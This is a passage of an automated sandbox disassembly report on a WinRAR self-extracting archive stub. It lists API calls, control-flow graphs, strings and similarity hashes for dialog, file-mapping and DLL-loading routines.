      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005CACF
    • IsDialogMessageW.USER32(?,?), ref: 0005CAE2
    • TranslateMessage.USER32(?), ref: 0005CAF0
    • DispatchMessageW.USER32(?), ref: 0005CAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005CB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0005CB40
    • GetDlgItem.USER32(?,00000068), ref: 0005CB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005CB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005CB91
      • Part of subcall function 0005E586: _wcslen.LIBCMT ref: 0005E5B0
    • SetFocus.USER32(00000000), ref: 0005CB98
    • _swprintf.LIBCMT ref: 0005CBF7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005CC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005CC82
    • GetTickCount.KERNEL32 ref: 0005CCA0
    • _swprintf.LIBCMT ref: 0005CCB8
    • GetLastError.KERNEL32(?,00000011), ref: 0005CCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005CD3D
    • _swprintf.LIBCMT ref: 0005CD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0005CDC8
    • GetCommandLineW.KERNEL32 ref: 0005CDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00091482,00000400,00000001,00000001), ref: 0005CE35
    • Sleep.KERNEL32(00000064), ref: 0005CEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00091482,00000400), ref: 0005CECE
    • CloseHandle.KERNEL32(00000000), ref: 0005CED7
    • _swprintf.LIBCMT ref: 0005CF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CF69
    • SetDlgItemTextW.USER32(?,00000065,000745F4), ref: 0005CF80
    • GetDlgItem.USER32(?,00000065), ref: 0005CF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005CF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005CFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D054
    • _wcslen.LIBCMT ref: 0005D0AA
    • _swprintf.LIBCMT ref: 0005D0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005D11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005D138
    • GetDlgItem.USER32(?,00000068), ref: 0005D141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005D157
    • GetDlgItem.USER32(?,00000066), ref: 0005D171
    • SetWindowTextW.USER32(00000000,0009389A), ref: 0005D193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005D1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 0005D2A9
    • EnableWindow.USER32(00000000,00000000), ref: 0005D383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005D3C5
      • Part of subcall function 0005D872: __EH_prolog.LIBCMT ref: 0005D877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D3E9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: 77ffdbeaf69d6409941b6e20f1b5f8a76b75bea11f4c6acbe1273897b5da4bf9
    • Instruction ID: 088a1247d03f71a23e005082c80a4926cdbfac8528d8c5eaebb5ad337a51998d
    • Opcode Fuzzy Hash: 77ffdbeaf69d6409941b6e20f1b5f8a76b75bea11f4c6acbe1273897b5da4bf9
    • Instruction Fuzzy Hash: E642C671944744BEFB219B609C4AFFF37ACAB12702F044156FA45B60D2CBB84E49CB66

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 51b7c-51b9f call 5ffc0 GetModuleHandleW 277 51ba1-51bb8 GetProcAddress 274->277 278 51c00-51e61 274->278 281 51bd2-51be2 GetProcAddress 277->281 282 51bba-51bd0 277->282 279 51e67-51e72 call 689de 278->279 280 51f2d-51f59 GetModuleFileNameW call 4d6a7 call 51928 278->280 279->280 291 51e78-51ea6 GetModuleFileNameW CreateFileW 279->291 297 51f5b-51f67 call 4c619 280->297 285 51be4-51bf9 281->285 286 51bfe 281->286 282->281 285->286 286->278 294 51f21-51f28 CloseHandle 291->294 295 51ea8-51eb4 SetFilePointer 291->295 294->280 295->294 298 51eb6-51ed2 ReadFile 295->298 303 51f96-51fbd call 4d71d GetFileAttributesW 297->303 304 51f69-51f74 call 51b34 297->304 298->294 300 51ed4-51ef9 298->300 302 51f16-51f1f call 51697 300->302 302->294 309 51efb-51f15 call 51b34 302->309 312 51fc7 303->312 313 51fbf-51fc3 303->313 304->303 315 51f76-51f94 CompareStringW 304->315 309->302 317 51fc9-51fce 312->317 313->297 316 51fc5 313->316 315->303 315->313 316->317 319 52005-52007 317->319 320 51fd0 317->320 322 52114-5211e 319->322 323 5200d-52024 call 4d6f1 call 4c619 319->323 321 51fd2-51ff9 call 4d71d GetFileAttributesW 320->321 328 52003 321->328 329 51ffb-51fff 321->329 333 52026-52087 call 51b34 * 2 call 4f937 call 44a20 call 4f937 call 5b7e4 323->333 334 5208c-520bf call 44a20 AllocConsole 323->334 328->319 329->321 332 52001 329->332 332->319 340 5210c-5210e ExitProcess 333->340 339 520c1-52106 GetCurrentProcessId AttachConsole call 64f93 GetStdHandle WriteConsoleW Sleep FreeConsole 334->339 334->340 339->340
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 00051B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00051E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00051EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,00074D24,00000000), ref: 00051ECA
    • CloseHandle.KERNEL32(00000000), ref: 00051F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00074D24,?,00000000,?,00000800), ref: 00051F8B
    • GetFileAttributesW.KERNEL32(?,?,00074D24,00000800,?,00000000,?,00000800), ref: 00051FB5
    • GetFileAttributesW.KERNEL32(?,?,00074DEC,00000800), ref: 00051FF1
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • _swprintf.LIBCMT ref: 00052063
    • _swprintf.LIBCMT ref: 000520AF
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • AllocConsole.KERNEL32 ref: 000520B7
    • GetCurrentProcessId.KERNEL32 ref: 000520C1
    • AttachConsole.KERNEL32(00000000), ref: 000520C8
    • _wcslen.LIBCMT ref: 000520DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000520EE
    • WriteConsoleW.KERNEL32(00000000), ref: 000520F5
    • Sleep.KERNEL32(00002710), ref: 00052100
    • FreeConsole.KERNEL32 ref: 00052106
    • ExitProcess.KERNEL32 ref: 0005210E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 291cf80b832b15a185b813b5723b161b203ce4cb0a0be45db1ba215ac064d1b2
    • Instruction ID: 61e17c5882b27b018b81fccc56612aaea06b18ed49857b44e19bfebb190aa6ba
    • Opcode Fuzzy Hash: 291cf80b832b15a185b813b5723b161b203ce4cb0a0be45db1ba215ac064d1b2
    • Instruction Fuzzy Hash: 13D172B18083849BD7319F50DC48BDFB6E8FB85305F50892DF68D96151DBBC8548CBAA
    APIs
    • __EH_prolog.LIBCMT ref: 0004ED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004EDCC
      • Part of subcall function 0004D6A7: _wcslen.LIBCMT ref: 0004D6AF
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 00052EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CF18,00000000,?,?), ref: 00052EDE
    • _wcslen.LIBCMT ref: 0004F109
    • __fprintf_l.LIBCMT ref: 0004F23C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: ae18fcaf31ec10a4fab74b37cbdea994292c8d1c2f43f468aaa1a4e628bc3ae7
    • Instruction ID: d6eafeccc78d2bbcd5cfe61a951344db699161891b1a843087eea62f36da04b4
    • Opcode Fuzzy Hash: ae18fcaf31ec10a4fab74b37cbdea994292c8d1c2f43f468aaa1a4e628bc3ae7
    • Instruction Fuzzy Hash: A932D0B1A0021AABDF24EF68C841AFE37A5FF44704F40457AFA0697192EB71DD85CB58

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 658 5aee5-5af13 ShowWindow call 5ac14 661 5af15-5af1d call 65209 658->661 662 5af1e-5af23 658->662 661->662 664 5af25-5af27 662->664 665 5af29-5af32 call 68a08 662->665 667 5af33-5af3b 664->667 665->667 670 5af41-5af4a call 68a08 667->670 671 5af3d-5af3f 667->671 672 5af4b-5af75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 674 5af77-5af7a DestroyWindow 672->674 675 5af80-5afc9 GetParent CreateWindowExW 672->675 674->675 677 5b008-5b00a 675->677 678 5afcb-5afce 675->678 680 5b00c-5b018 ShowWindow UpdateWindow 677->680 681 5b01e-5b024 677->681 678->677 679 5afd0-5afd2 678->679 679->681 682 5afd4-5afd7 679->682 680->681 682->681 683 5afd9-5afdc 682->683 683->681 684 5afde-5afec call 5ad0e 683->684 684->681 687 5afee-5b006 ShowWindow SetWindowTextW call 65209 684->687 687->681
    APIs
    • ShowWindow.USER32(?,00000000), ref: 0005AEFE
      • Part of subcall function 0005AC14: LoadCursorW.USER32(00000000,00007F00), ref: 0005AC4B
      • Part of subcall function 0005AC14: RegisterClassExW.USER32(00000030), ref: 0005AC6C
    • GetWindowRect.USER32(?,?), ref: 0005AF54
    • GetParent.USER32(?), ref: 0005AF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 0005AF6B
    • DestroyWindow.USER32(00000000), ref: 0005AF7A
    • GetParent.USER32(?), ref: 0005AF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0005AFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 0005AFF1
    • SetWindowTextW.USER32(?,00000000), ref: 0005AFF9
    • ShowWindow.USER32(00000000,00000005), ref: 0005B00F
    • UpdateWindow.USER32(00000000), ref: 0005B018
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: 80461f516e447e362a978f6d8cbbe8cc989b7edda1d1a0b53c29aae1e898e9bf
    • Instruction ID: ce929ce64c69341c8bf353011b82f2a61bc883a5ab139e5508812c234eb847c3
    • Opcode Fuzzy Hash: 80461f516e447e362a978f6d8cbbe8cc989b7edda1d1a0b53c29aae1e898e9bf
    • Instruction Fuzzy Hash: E241E271104604EFEB219F64DC49BAF7BE8FF49302F144669FD4999092DB74E808CB66

    Control-flow Graph

    APIs
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    • GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005E643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E64E
    • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E714
    • SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E723
      • Part of subcall function 0005A235: DestroyWindow.USER32(?,00000000,0005E640,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005A241
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: c63c85fa3e9049dfeae01d5c5aa24c9ff0fb5f287e6cf60f981062d8235b0de8
    • Instruction ID: 75419e38c15c832771cfca5c8c55ef992939a59c6bbb806ecba887e4cf7d566a
    • Opcode Fuzzy Hash: c63c85fa3e9049dfeae01d5c5aa24c9ff0fb5f287e6cf60f981062d8235b0de8
    • Instruction Fuzzy Hash: 4231A171685F44ABF301DF20DC4AFBB3AACFB87706F000A0DF69196191C7695A088B66

    Control-flow Graph

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00066993,00066993,?,?,?,0006BD5C,00000001,00000001,62E85006), ref: 0006BB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006BD5C,00000001,00000001,62E85006,?,?,?), ref: 0006BBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006BCE5
    • __freea.LIBCMT ref: 0006BCF2
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • __freea.LIBCMT ref: 0006BCFB
    • __freea.LIBCMT ref: 0006BD20
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: 632eceb520d9c921186ff54f7f390835f0907ad235d91bc8db1f0e616650b143
    • Instruction ID: c3a89d0e8cd689d6217f1bea262fbcfb14b7b0a18264deb6a6de104661fb8a50
    • Opcode Fuzzy Hash: 632eceb520d9c921186ff54f7f390835f0907ad235d91bc8db1f0e616650b143
    • Instruction Fuzzy Hash: D951E0B2600216ABEB259F65CC42EBF77EBEF44760F144668FD04DA141EF34DD8086A0

    Control-flow Graph

    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 0005BBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005BBFE
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005BBEE
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: @UHv$EDIT
    • API String ID: 4243998846-761748159
    • Opcode ID: 3cbbb45eadae9a2049c9c1749ec728e46d2e721de360bac9f5d3b12e7e47bb47
    • Instruction ID: 2a7527e06d427a25cc57e3452c1390bf655e18028f816603df0ce28cb00a2779
    • Opcode Fuzzy Hash: 3cbbb45eadae9a2049c9c1749ec728e46d2e721de360bac9f5d3b12e7e47bb47
    • Instruction Fuzzy Hash: C0F0AE32600B1877E73056159C09FEF76ACBF46B42F450051BE01F61C5DBA4E905C5F9

    Control-flow Graph

    APIs
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • OleInitialize.OLE32(00000000), ref: 0005BD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD5B
    • SHGetMalloc.SHELL32(0008A460), ref: 0005BD65
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll$3Ro
    • API String ID: 3498096277-3613677438
    • Opcode ID: 230f60d169611d9b8358ddda418fbd31f1e5482ad57ea1eba1ab6d7699550b52
    • Instruction ID: f24bd8285f5fdfdecf4bdcd6e99fced0f427d653000e50b40fc0bd723569619a
    • Opcode Fuzzy Hash: 230f60d169611d9b8358ddda418fbd31f1e5482ad57ea1eba1ab6d7699550b52
    • Instruction Fuzzy Hash: 72F049B1D00609ABDB10AF99CC499EFFBFCFF85302F00401AE910A2241DBB846098BA1

    Control-flow Graph

    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00048243,?,00000005,?,00000011), ref: 0004ABBF
    • GetLastError.KERNEL32(?,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00048243,?,00000005,?), ref: 0004AC02
    • GetLastError.KERNEL32(?,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC59
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
    • Instruction ID: c51f943b9b9c873c5dbedd6f3c094010edfe55b40b30eafcb3565755d3a9b193
    • Opcode Fuzzy Hash: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
    • Instruction Fuzzy Hash: 91312B70A847457FE7709F24DC45BDAB7D4BB06320F100B29F9A4961D2D3B96884CBDA

    Control-flow Graph

    APIs
      • Part of subcall function 000524DF: ResetEvent.KERNEL32(?), ref: 000524F1
      • Part of subcall function 000524DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00052505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0005223A
    • CloseHandle.KERNEL32(?,?), ref: 00052254
    • DeleteCriticalSection.KERNEL32(?), ref: 0005226D
    • CloseHandle.KERNEL32(?), ref: 00052279
    • CloseHandle.KERNEL32(?), ref: 00052285
      • Part of subcall function 000522FC: WaitForSingleObject.KERNEL32(?,000000FF,00052516,?), ref: 00052302
      • Part of subcall function 000522FC: GetLastError.KERNEL32(?), ref: 0005230E
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 3fc01ab24251e151c6e78f26b5889486b59c206a4d7db51a708a2e75bc980606
    • Instruction ID: df1a974991d32760761844a2cd0bf03aa7163fe2ee55c736d8208cf209e3a99f
    • Opcode Fuzzy Hash: 3fc01ab24251e151c6e78f26b5889486b59c206a4d7db51a708a2e75bc980606
    • Instruction Fuzzy Hash: 1C018876800744EFD7229F64DD85BC6BBA9FF08711F004929F26E62160CB797994DB90

    Control-flow Graph

    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
    • IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
    • TranslateMessage.USER32(?), ref: 0005C78C
    • DispatchMessageW.USER32(?), ref: 0005C796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: 0e475314390cf6945fd8486c9266b842e020895465beaba6a2e95b6d7f2df632
    • Instruction ID: 1492bd27452cd12022c063efea616360beaa4fca2fef1fe9a1609eb202fda01d
    • Opcode Fuzzy Hash: 0e475314390cf6945fd8486c9266b842e020895465beaba6a2e95b6d7f2df632
    • Instruction Fuzzy Hash: 2FF0BD71901619ABAF209BA19C4DDDB7FBCFF063927404415B906D2010E778D505CBF0

    Control-flow Graph

    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005ED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005ED70
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: 5fa29c2de8c285297abc1c77ac17705eb7c52f39602f00ec427ebd22ead47402
    • Instruction ID: ddbfdd20a4311c866e93fb6179fef858b603d7bbde920c833127e66b3ffb40d4
    • Opcode Fuzzy Hash: 5fa29c2de8c285297abc1c77ac17705eb7c52f39602f00ec427ebd22ead47402
    • Instruction Fuzzy Hash: AEF0A771804634A6DB202B90CC09FEB7BA8DF15743B444061BD89A6052EB698988C6B1

    Control-flow Graph

    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00064D43,00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx), ref: 00064D9F
    • GetLastError.KERNEL32(?,00064D43,00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064C9D), ref: 00064DA9
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00064DD1
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 4bbc8211bb36f01c2d9b5e9e0da527d326e4bb1a224e777bff8d6576aa5fed22
    • Instruction ID: 47a3019e063d814fdd631770ed4eb1c30ada10e3bc698cd85b8df33c642bf285
    • Opcode Fuzzy Hash: 4bbc8211bb36f01c2d9b5e9e0da527d326e4bb1a224e777bff8d6576aa5fed22
    • Instruction Fuzzy Hash: 22E04F34E84208F7FF101B60EC06B593F9AAF10B55F104020FA0DB84F1DB6A99A19694

    Control-flow Graph

    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 0004A9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0004AA0D
    • GetLastError.KERNEL32 ref: 0004AA3F
    • GetLastError.KERNEL32 ref: 0004AA5E
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
    • Instruction ID: 65a346271f1c9502ec53e225d9dcd3a0fb04b1afe73227836e5d63d5496b41cc
    • Opcode Fuzzy Hash: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
    • Instruction Fuzzy Hash: BB11A0B5B80204EBDF709F64DA046AE37E9BB07360F104636F95691190C778CE90DB9B
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0004EA30,00000000,00000000,?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue), ref: 0006BF16
    • GetLastError.KERNEL32(?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue,00078A00,FlsSetValue,00000000,00000364,?,0006A5D7), ref: 0006BF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue,00078A00,FlsSetValue,00000000), ref: 0006BF30
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
